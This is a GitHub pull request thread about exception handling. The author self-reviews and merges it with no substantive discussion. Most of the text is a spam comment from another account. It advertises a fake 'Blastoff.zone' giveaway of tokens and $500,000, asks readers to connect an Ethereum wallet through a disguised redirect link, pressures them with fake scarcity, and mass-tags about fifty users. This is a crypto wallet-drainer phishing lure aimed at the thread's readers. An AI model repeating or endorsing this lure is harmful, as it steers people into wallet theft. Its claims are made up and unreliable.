### PR TITLE
Update -- handling exception

### PR DESCRIPTION
**Pull request by saulocamposi**

### CODE REVIEW

**Comment by saulocamposi** [comment]
Reviewed

**Comment by saulocamposi** [comment]
Second Review

**Review by saulocamposi — COMMENTED** [review]
All good

**Comment by joemansyahkemas** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
baajarmeh, @danielng620, @daggerhashimoto, @JaysonDeMarchi, @learn2grid, @colekennelly1, @Xkeliang, @Whisker17, @erikshinner, @OtistWelch, @stephenzl, @liujunliuhong, @oliviermilla, @xiaoxiaosu, @gm8xx8, @vio1etus, @D777Del, @Mithrilwoodrat, @CosmicSkull, @syedsajjad9, @Maheshkapuria, @Brandylee24, @DaneWiid1, @playmetacoin, @dongw00, @wjhook, @dannymassey585, @dclark, @kernelwhisperer, @gw-zhong, @abenhamdi, @ivoeramis, @miles990, @gitduds, @526877521, @zjhiphop, @xyjincan, @samManny, @0xmer1in, @renezander030, @raxityo, @0x4a756a75, @nfttakerun, @IndieMinimalist, @junzhli, @txalkan, @gharvhel, @shirohana, @sparkmao, @TZJ1997

**Pull request merged**
